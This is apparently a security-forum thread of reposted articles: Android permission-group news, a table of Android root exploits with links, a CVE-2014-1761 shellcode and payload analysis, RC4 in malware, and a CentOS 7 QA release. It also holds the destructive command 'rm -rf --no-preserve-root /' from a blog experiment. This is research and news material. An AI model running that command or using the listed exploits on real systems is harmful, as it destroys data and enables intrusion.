Nytro

Am folosit doar versiunea free. Bine, parca gasisem si o versiune mai veche crackuita, dar nu am ramas surprins de el.

Android's New App Permissions Setup Raises Red Flags By Eduard Kovacs on June 13, 2014 Google has recently made changes to the way permissions for Android applications are displayed, but experts warn that the modifications make automatic updating of mobile applications riskier than before. Under the new format, permissions requested by Android applications are organized into groups to simplify the installation process and help users make informed decisions about whether or not they want to install a certain app, Google developers noted. The problem, as highlighted by many security experts, is the fact that if a user gives an app access to a certain permission category, when the app is updated, it can start using other permissions in the same category without informing the user. “Once you’ve allowed an app to access a permissions group, the app may use any of the individual permissions that are part of that group. You won’t need to manually approve individual permissions updates that belong to a permissions group you’ve already accepted,” Google explained. For example, if an application needs to read text messages, the user must give it access to the “SMS” permissions group. If the app is updated, it can automatically access all other individual permission in the “SMS” group ? such as edit text messages, send SMS messages and receive text messages ? without the user being notified. Furthermore, Google has decided to remove network communication permissions from the primary permissions screen on the basis that most apps need access to the Web in order to work. The company said it was removing apps that violate Google Play policies, and noted that systems are in place to protect users against potentially harmful elements. Georgia Weidman, the CEO of Bulb Security, told SecurityWeek that the changes are a “step in the complete wrong direction.” “Most users don't really care about permissions anyway, but it seems a red flag to me that if you've accepted something in a certain group you don't get notified of additional permissions in that group on update,” Weidman said. “Google hopes to solve the problem of apps not autoupdating by grouping permissions into categories. But you risk apps being able to silently add new permissions when they update,” Marc Rogers, principal security researcher at Lookout, told SecurityWeek in an emailed statement. “Under the new system Google will only notify users if an app requests permissions in a group the user hasn't already accepted. People need to understand that they are essentially allowing all permissions in a given category.” “Right now the best advice to users who are concerned about permissions is that you should go into the Play store and change the settings for apps to turn off autoupdate for any app that you do not implicitly trust,” Rogers said. This way the app has to be manually updated and you get a chance to check its permissions with each install.” There are also several threads on Reddit highlighting the negative impact these changes have on security and privacy. Sursa: Android's New App Permissions Setup Raises Red Flags | SecurityWeek.Com

[TABLE=width: 100%] [TR] [TD]Android Cheatsheet (updates to dweinst@insitusec.com) : Vuln/Exploit List (privesc)[/TD] [/TR] [/TABLE] [TABLE=class: tblGenFixed] [TR=class: rShim] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s0]Vulnerability/Exploit name[/TD] [TD=class: s1]release date[/TD] [TD=class: s1]author[/TD] [TD=class: s1]effect (root, unlock,...)[/TD] [TD=class: s1]notes[/TD] [TD=class: s1]link[/TD] [TD=class: s2][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]psneuter[/TD] [TD][/TD] [TD=class: s4]scotty2[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4]https://github.com/tmzt/g2root-kmod/blob/master/scotty2/psneuter/psneuter.c[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Exploid[/TD] [TD=class: s5]7/15/2010[/TD] [TD=class: s4]Stealth[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4]C-skills: android trickery[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]GingerBreak[/TD] [TD=class: s5]5/26/2011[/TD] [TD=class: s4]Stealth[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4]C-skills: yummy yummy, GingerBreak![/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]RageAgainstTheCage[/TD] [TD][/TD] [TD=class: s4]Stealth[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]KillingInTheNameOf[/TD] [TD][/TD] [TD=class: s4]Stealth[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4]C-skills: adb trickery #2[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Zimperlich[/TD] [TD=class: s5]2/24/2011[/TD] [TD=class: s4]Stealth[/TD] [TD][/TD] [TD][/TD] [TD=class: s4]C-skills: Zimperlich sources[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Zergrush[/TD] [TD][/TD] [TD=class: s4]Revolutionary[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4]https://github.com/revolutionary/zergRush/blob/master/zergRush.c[/TD] [TD=class: s4]Revolutionary - zergRush local root 2.2/2.3 [22-10: Samsung/SE update] - xda-developers[/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Tacoroot[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]HTC Recovery symlink attack to local.prop from /data/recovery/something bliss found first, but was too slow![/TD] [TD=class: s4]https://github.com/CunningLogic/TacoRoot[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Nachoroot[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]AMI304 Magnetic Sensor, symlink to local.prop. [/TD] [TD=class: s4]https://github.com/CunningLogic/NachoRoot[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Burritoroot[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Typo prevented app from sending a debugging intent, caused adb to run as root[/TD] [TD=class: s4]https://github.com/CunningLogic/BurritoRoot[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Gorditaroot[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]install custom recovery or root[/TD] [TD=class: s4]Similar to Nachoroot, different path, AMI304 Magnetic Sensor, symlink to recovery mtd device[/TD] [TD=class: s4]https://github.com/CunningLogic/GorditaRoot[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Enchilada[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]System left r/w & Internal memory left as ext4? I think. Symlink attack from DCIM dir to install-recovery.sh[/TD] [TD=class: s4]https://github.com/CunningLogic/Enchilada[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]ZTERoot (Avail)[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]~70 rediculous intents left over from engineering. Stupid OEM.[/TD] [TD=class: s4]https://github.com/CunningLogic/ZTERoot[/TD] [TD=class: s4][Exclusive] Developer Codes Left In Retail ZTE Avail (AT&T) Offer Quick And Easy Root Access[/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]ZTERoot (Merrit)[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Symlink attack from debugging/logging app[/TD] [TD=class: s4][ROOT] ZTE z990g Merit (An avail variant?) - xda-developers[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]LG ICS Root[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Symlink attack[/TD] [TD=class: s4][ROOT] LG Intuition & LG Spectrum ICS - xda-developers[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]DefyXT Root[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s6]Unprotected intent allowing various permission changes.[/TD] [TD=class: s4][Root] Republic Wireless Motorola Defy XT - xda-developers[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Cyanide[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]DeftXT Root Loggerlancher changing permissions, system mounted r/w[/TD] [TD=class: s4]https://github.com/CunningLogic/Cyanide[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]LG Optimus Logic[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]LG Optmus Elite[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]LG not verifying integrity of system partition when flashing through download mode. TOT images are patchable. Probably valid on all LG devices.[/TD] [TD=class: s4][Exclusive] How To Root The Virgin Mobile LG Optimus Elite[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Pantech[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Pantach does not verify integerty of system partition when flashing through download mode. PDL images are patchable.[/TD] [TD=class: s4]unpublished[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]HTC DNA[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]enable unlocking[/TD] [TD=class: s4]Backupmanger sets /data 777, then symlink to mmbblk0p5 to change CID. Not root, but enables bootloader unlock[/TD] [TD=class: s4][unlock] Bootloader unlock - Updated November 26th 2012 - xda-developers[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]HTC One X AT&T[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]HTC Ready2go webapp triggering chmod 777 on file in world writable dir. Lasted whole 4 hours.[/TD] [TD=class: s4][Exclusive] How To Root The AT&T HTC One X On Version 1.85 (Or Earlier)[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Hisense Pulse[/TD] [TD][/TD] [TD=class: s4]cj_000[/TD] [TD=class: s4]root[/TD] [TD=class: s4]ro.debuggable=1 on initial firmware[/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Generic LG[/TD] [TD][/TD] [TD=class: s7]?[/TD] [TD=class: s4]root[/TD] [TD=class: s4]ro.debuggable=1 on some older LGs[/TD] [TD=class: s4]unpublished[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]LG ADB Backdoor[/TD] [TD][/TD] [TD=class: s4]Giantpune[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Backdoor, restarts adb as root with key[/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Poot[/TD] [TD][/TD] [TD=class: s4]Giantpune[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Qualcomm diag device[/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Lit[/TD] [TD][/TD] [TD=class: s4]Giantpune[/TD] [TD=class: s4]root[/TD] [TD=class: s4]LG Backlight[/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]ZTE Backdoor[/TD] [TD][/TD] [TD=class: s4]"Anonymous"[/TD] [TD=class: s4]root[/TD] [TD=class: s4]binary spawned root shell, password protected.[/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]HTC Eris 2.1 Root[/TD] [TD][/TD] [TD=class: s4]wag3slav3[/TD] [TD=class: s4]install custom recovery[/TD] [TD=class: s4]symlink attack from /data/local/something to recovery block device[/TD] [TD=class: s4]? XDA Forums[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Droid 3 Root[/TD] [TD=class: s5]8/25/2011[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack from /data/local/something to local.prop[/TD] [TD=class: s4]Security Research by Dan Rosenberg[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Motofail[/TD] [TD=class: s5]2/11/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/dontpanic and /data/logger[/TD] [TD=class: s4]http://vulnfactory.org/public/motofail_windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]XYZ[/TD] [TD=class: s5]2/17/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /pds/public/battd, /data/dontpanic, and /data/logger[/TD] [TD=class: s4]http://vulnfactory.org/public/xyz_windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]LG Spectrum Root[/TD] [TD=class: s5]2/19/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/gpscfg/gps_env.conf[/TD] [TD=class: s4]http://vulnfactory.org/public/spectrum_root_windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Megatron[/TD] [TD=class: s5]2/26/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on com.ti.fmrxapp[/TD] [TD=class: s4]Security Research by Dan Rosenberg[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]LG Esteem Root[/TD] [TD=class: s5]2/15/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/bootlogo/bootlogopid[/TD] [TD=class: s4]http://vulnfactory.org/public/LG_Esteem_Root_v2_Windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Razr's Edge[/TD] [TD=class: s5]6/21/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/local/12m[/TD] [TD=class: s4]http://vulnfactory.org/public/razrs_edge_windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Razr Blade[/TD] [TD=class: s5]1/15/2013[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/dontpanic, overwriting SmartActions .jar file to run code as system[/TD] [TD=class: s6]http://vulnfactory.org/public/razr_blade.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]X-Factor[/TD] [TD=class: s5]10/23/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]change CID[/TD] [TD=class: s4]symlink attack on telephony ADB restore to change permissions on /dev/diag, followed by kernel exploit (same as Poot)[/TD] [TD=class: s4][ROOT] HTC One X AT&T 2.20 Firmware - X-Factor root exploit - xda-developers[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Samsung Admire Root[/TD] [TD=class: s5]9/12/2011[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/log/dumpState_app_native.log[/TD] [TD=class: s4]Security Research by Dan Rosenberg[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Thinkpad Tablet[/TD] [TD=class: s5]1/22/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on Lenovo Mobility Manager[/TD] [TD=class: s4]http://vulnfactory.org/public/Thinkpad_Root_Windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Sony Tablet S[/TD] [TD=class: s5]2/8/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /log to change package.list, followed by symlink attack on "pm" (replace "lib" directory of system app to remove arbitrary files)[/TD] [TD=class: s4]Security Research by Dan Rosenberg[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Xoomfail[/TD] [TD=class: s5]2/18/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]cmdclient changed perms on /data to 0777 by design[/TD] [TD=class: s4]Security Research by Dan Rosenberg[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Motofail2Go[/TD] [TD=class: s5]10/16/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on data directory for bug2go[/TD] [TD=class: s4]http://vulnfactory.org/public/motofail2go_windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]XPRT[/TD] [TD=class: s5]10/8/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/dontpanic[/TD] [TD=class: s4]http://vulnfactory.org/public/xprt_root_windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Nandpwn[/TD] [TD=class: s5]8/4/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Ridiculousness on Logitech Revue[/TD] [TD=class: s4]https://github.com/djrbliss/revue/tree/master/nandpwn[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Motochopper[/TD] [TD=class: s8]4/9/2013[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4]http://vulnfactory.org/public/motochopper.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]ADB Restore Root[/TD] [TD][/TD] [TD=class: s4]bin4ry[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Exynos-abuse[/TD] [TD][/TD] [TD=class: s4]alephzain[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Access to system memory through /dev/exynos-mem on Exynos devices[/TD] [TD=class: s4][ROOT][sECURITY] Root exploit on Exynos - xda-developers[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]IconiaRoot[/TD] [TD][/TD] [TD=class: s4]alephzain[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4][ROOT][sECURITY] Root exploit on Exynos - xda-developers[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]fr3vo[/TD] [TD][/TD] [TD=class: s4]Kevin Bruckert[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Arbitrary kernel write in Qualcomm's MSM rotator[/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]levitator[/TD] [TD][/TD] [TD=class: s4]Jon Larimer, Jon Oberheide[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Out-of-bounds memory mapping in pvrsrvkm[/TD] [TD=class: s4]http://jon.oberheide.org/files/levitator.c[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]mempodroid[/TD] [TD][/TD] [TD=class: s4]saurik/zx2c4[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Bad kernel jazz with /proc/pid/mem and suid binaries[/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]asroot (Wunderbar?)[/TD] [TD][/TD] [TD=class: s4]zinx[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4]http://code.google.com/p/flashrec/source/browse/#svn%2Ftrunk%2Fandroid-root[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Samsung Infuse 4G[/TD] [TD=class: s5]1/3/2012[/TD] [TD=class: s4]Michael Coppola[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/data/.drm/.wmdrm/sample.hds[/TD] [TD=class: s4]Rooting the Samsung Infuse 4G | Michael Coppola's Blog[/TD] [TD][/TD] [/TR] [/TABLE] Publicat de Google Drive – Raporta?i un abuz – Se actualizeaz? automat la fiecare 5 minute

DarunGrim: A Patch Analysis and Binary Diffing Tool Introduction DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provides binary diffing functionality. Binary diffing is a powerful technique to reverse-engineer patches released by software vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities it's fixing. You can use that information to learn what causes software break. Also that information can help you write some protection codes for those specific vulnerabilities. It's also used to write 1-day exploits by malware writers or security researchers. This binary diffing technique is especially useful for Microsoft binaries. Not like other vendors they are releasing patch regularly and the patched vulnerabilities are relatively concentrated in small areas in the code. That makes the patched part more visible and apparent to the patch analyzers. * DarunGrim 3: DarunGrim3 is an advanced version of DarunGrim2 which provides nice file management UI. Binaries: http://github.com/ohjeongwook/DarunGrim/downloads Source: http://github.com/ohjeongwook/DarunGrim License: New BSD License Documentation: DarunGrim 3 Installation & Usage Guide Blogs: Reverse Engineering | Reverse Engineering stuff Sursa: DarunGrim: A Patch Analysis and Binary Diffing Tool

Extracting the payload from a CVE-2014-1761 RTF document Monday June 9, 2014 Background In March Microsoft published security advisory 2953095, detailing a remote code execution vulnerability in multiple versions of Microsoft Office (CVE-2014-1761). A Technet blog was released at the same time which contained excellent information on how a typical malicious document would be constructed. NCC Group’s Cyber Defence Operations team used the information in the Technet blog to identify a malicious document within our malware zoo that exploited this vulnerability which appears to have been used in a targeted attack. In this blog we show one method of analysing the shellcode manually to extract the payload. Matching the malicious document The Technet blog gives a number of pointers toward a malicious document. First there is a bad header at the beginning of the document, which should be {\rtf in a real document but is {\rt{. Our sample matches this: The MSComctl object is a short way into the document, in this case an ImageComboCtl: And it is easy to identify the potential ROP chain: What will happen if the exploit is successful? If the exploit doesn’t work on our test systems, how can we manually extract the payload? We know that the document should contain something useful, either saving malicious embedded content or using a URL download/execute. But where is this shellcode? Analysing the shellcode After identifying the vulnerability we can now hunt for the shellcode which will run on successful exploitation. The Technet blog suggests the shellcode is placed near the end of the file so this is a good place to start. Upon loading into IDA the correct option to choose is 32-bit disassembly. Locating the shellcode How can we quickly identify what might be code? One common technique in shellcode is using the hashes of Windows APIs, searching for these can often yield good results. Running a small IDA Python script over the database returns some possible matches: The first four are probably misdetections but the following API names definitely look suspicious. All of them are toward the end of the file, which ends at 0x71CB1. Checking the results for Sleep() and ExitProcess() shows the following potential shellcode locations: Turning the bytes into code It is now possible to see where some of the hashed APIs might be used, which gives an indication of where the shellcode is located. We can begin to convert the unknown bytes into code (right click and choose “Code”, or use the shortcut ‘C’). If we accidentally choose the wrong place to start analysing then it is possible to end up with “”junk” results, as demonstrated below: We can fix this by undefining the junk code (right click, “Undefine” or shortcut ‘U’), then making code at a slightly different offset. Very quickly the disassembly starts looking like real code: Calling functions by hash We can now see that the API hash is placed in the EBX register before a function is called, which has been manually named CallByHash by us in the disassembly above. This function uses the standard mechanism of obtaining the PEB to find loaded modules: The correct API is found using a simple ROR 0x13 (19 decimal) loop until the generated hash matches the value in EBX where the desired hash is stored (see comparison instruction at 0x71A83). This allows the shellcode to locate and call any Windows API from kernel32.dll without knowing anything about the process which loaded the RTF file or including API name strings. Finding ourselves – where is the RTF file? The shellcode next needs to find the RTF file so it can locate and save the payload. It does this by iterating over all possible file handles until a valid one is found. This will always work because Word must have the RTF file open in order to parse it. The code below tries each possible handle in turn, starting from 0x4 until 0x4000. It then calls GetFileSize, ensuring that the handle is valid by checking the return code. The code which follows is responsible for finding the start of the payload and saving it to disk. The position is first reset to the start of the file (offset 0) using SetFilePointer. The loop below then looks for the characters S18t in the document and obtains the offset if the string is found. If the characters are not present then the shellcode tries the next handle until an open file containing S18t is located. Once the payload data is found it is unobfuscated with a simple XOR loop, seen below. This is important to note for when we extract the data manually later. Following this are standard calls to GetTempPathA, CreateDirectoryA, CreateFileA and WriteFile, which save the payload to disk. Finally the shellcode calls LoadLibraryExA to launch the payload and then sleeps before calling ExitProcess to terminate Microsoft Word cleanly. Unusual code or shellcode trickery? Other typical techniques are also evident, for example this simple sequence: The constant 0x40000000 (equivalent to GENERIC_WRITE permissions) is obtained by taking the number 0x41010101 and subtracting 0x1010101, avoiding null bytes in the shellcode. The same trick is used for some API hashes, for example CloseHandle below: A simple calculation shows that the hash for CloseHandle would be 0xED00C776, which contains a null byte. Extracting the payload With the information above we can extract the payload data from the document and decode the executable which will be run. By searching for the string S18t the start of data can be found. The bytes following S18t look suspiciously like an obfuscated PE header, using our earlier information about the usage of XOR 0x4 we can test to see if this is correct: From here we can copy all of the bytes from offset 0x6c38 to the end of the file and then apply XOR 0x4 to obtain a PE file. The resulting file will contain the shellcode at the end; this could be removed if desired. Loading the payload into IDA shows a well formed executable which allows us to begin further analysis. In this instance the payload was a 425KB executable which is often called the “havex RAT”. Crowdstrike attribute the use of this malware to a group called ENERGETIC BEAR in their Global Threat Report 2013. At the time of our analysis only 1 antivirus engine of 50 on VirusTotal detected the payload as malicious, once again highlighting the malicious code arms race. Conclusion Using the techniques described above it is possible to extract the payload even if the exploit is unreliable or we have an incomplete malicious document. This allows creation of network or host indicators that allow us to prevent or detect the malicious payload. It is also a useful reminder of the speed at which known attackers will use new exploits to distribute their existing malware. For further information: Follow us on twitter @NCCGroupInfosec for notifications of new blog articles. If you’re an existing customer please contact your account manager if you required tailored advice and consultancy, including incident response, forensics, malicious code analysis and cyber defence services. Sursa: https://www.nccgroup.com/en/blog/2014/06/extracting-the-payload-from-a-cve-2014-1761-rtf-document/

rm -rf remains Just for fun, I decided to launch a new Linux server and run rm -rf / as root to see what remains. As I found out, rm lives in the future with idiots like me, so you have to specify --no-preserve-root to kick this exercise off. # rm -rf --no-preserve-root / After committing this act of tomfoolery, great utilities like /bin/ls /bin/cat /bin/chmod /usr/bin/file will all be gone! You should still have your connection over SSH as well as your existing bash session. This means you have all the bash builtins, like echo. Articol complet: rm -rf remains

An Introduction to Recognizing and Decoding RC4 Encryption in Malware There is something that we come across almost daily when we analyze malware in the VRT: RC4. We recently came across CVE-2014-1776 and like many malware samples and exploits we analyze, RC4 is used to obfuscate or encrypt what it is really doing. There are many ways to implement RC4 and it is a very simple, small algorithm. This makes it very common in the wild and in various standard applications. Open-source C implementations can be found on several websites such as Apple.com and OpenSSL.org. What is RC4? RC4 was designed by Ron Rivest of RSA Security in 1987. RC4 is a fast and simple stream cipher that uses a pseudo-random number generation algorithm to generate a key stream. This key stream can be used in an XOR operation with plaintext to generate ciphertext. The same key stream can then be used in an XOR operation against the ciphertext to generate the original plaintext. While it is still common in malware, RC4 has been legitimately implemented in a number of areas where speed and privacy are of concern. In the past, both WEP and TLS both used RC4 to protect data sent across the wire. However, last Fall, Microsoft recommended that customers disable RC4 by enabling TLS1.2 and AES-GCM. For more information including a detailed history of RC4, check out the Wikipedia article. Why is it used in malware? Increasingly, we find that RC4 is used to encode data that is sent to a remote server to be decrypted on the other side using a pre-shared key. This makes detection a bit trickier (but not impossible) and also makes it harder to determine exactly what is being sent across the wire. What we will usually do when we think we’ve come across some sort of encryption is determine the source of it and whether the data being sent is static (for matching purposes) and what exactly that data is. Articol complet: VRT: An Introduction to Recognizing and Decoding RC4 Encryption in Malware

CentOS 7 Public QA Release Friday , 13, June 2014 Jeff Sheltren We are happy to announce the immediate availability of the first CentOS 7 QA Release. !!! This is a QA release only and not the final CentOS 7 release !!! In the past, CentOS QA testing has been performed by a small group of people within the CentOS community. We are happy that we are now able to open this up to the wider community to get early feedback and bug reports prior to the 7 release. CentOS 7 QA release is available for download at: Index of / We are first populating individual RPMs in their respective build directories. Once there is a working base install tree, it will be made available at the same URL. Please note the following: - This is NOT the final CentOS 7 release. Packages, ISOs, and install media *will* change between this release and the final 7 release. - The packages posted at the above URL will likely be updated in-place before the final release. - Things may be broken! Don’t install this on your production servers. Consider it a beta/preview release. - Help us make the 7 release better by reporting bugs at My View - CentOS Bug Tracker - This is not an officially supported release. If you have questions, aren’t sure if you’ve found a bug, etc., please ask in #centos-devel on Freenode, or email the centos-devel email list. - Packages in the QA release are *not* GPG-signed. The final 7 release will contain gpg-signed packages as usual. - Upgrading from the QA release to the final 7 release may be possible, but it’s not supported or documented in any way. Expect that you will need to re-install when 7 final is released. We appreciate any and all bug reports at My View - CentOS Bug Tracker (please also check upstream bugzilla.redhat.com and link to those bugs when filing a new CentOS issue), and assistance with the “Branding Hunt” (see [CentOS-devel] The Branding Hunt - howto). https://access.redhat.com/site/documentation/en-US/Red_Hat_Enterprise_Linux/7/html/7.0_Release_Notes/part-Red_Hat_Enterprise_Linux-7.0_Release_Notes-Known_Issues.html contains a list of known issues at the time of the upstream release. Currently, we only have RPM packages online, but will be bringing installable media online as soon as we have it ready. Again, this is NOT a final release. It may harm nearby puppies, kittens, or other (cute) animals and/or servers. This is our first attempt at opening up CentOS to the wider community, so please bear with us as we work through any issues that arise with the process. As always, feedback is welcome on the email list or on IRC (#centos-devel on Freenode). Edit: Even though we don’t yet have an installable tree in place, you can point an existing el7beta/el7rc install to the buildlogs repo with the following yum repo definitions (for example /etc/yum.repos.d/centos-buildlogs.repo) : [centos-qa-03] name=CentOS Open QA – c7.00.03 baseurl=Index of /c7.00.03 enabled=1 gpgcheck=0 [centos-qa-04] name=CentOS Open QA – c7.00.04 baseurl=Index of /c7.00.04 enabled=1 gpgcheck=0 Thanks, and enjoy the release! -Jeff Sheltren on behalf of the CentOS QA Team Sursa: CentOS 7 Public QA Release – Seven.CentOS.org

